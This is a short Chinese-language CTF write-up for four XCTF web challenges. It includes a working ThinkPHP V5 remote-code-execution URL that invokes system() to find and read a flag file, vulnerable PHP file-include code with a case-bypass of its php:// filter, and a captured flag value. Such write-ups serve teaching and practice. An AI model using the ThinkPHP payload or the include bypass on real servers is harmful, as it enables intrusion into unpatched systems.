XCTF WEB 进阶区 001-004 WP

XCTF WEB 进阶区 001-004 WP

001.baby_web

打开主页index.php,会自动跳转回1.php直接抓包获得flag

002.Trining-WWW-Robots

直接查看robots.txt文件

再查看fl0g.php文件,获得 cyberpeace{6f67c47379852dd00c1075dcf584f269}

003.php_rce

网页提示ThinkPHP V5 直接百度相关漏洞

1.查找flag

[http://220.249.52.133:52341/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag"](http://220.249.52.133:52341/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag")

2.查看flag

http://220.249.52.133:52341/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

004.Web_php_include

代码审计

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

题目名字显而易见,文件包含。分析源码 php:// 被过滤了。Php://直接绕过

直接cat获取flag

posted @ 2020-08-07 12:59  李沐子  阅读(144)  评论(0)    收藏  举报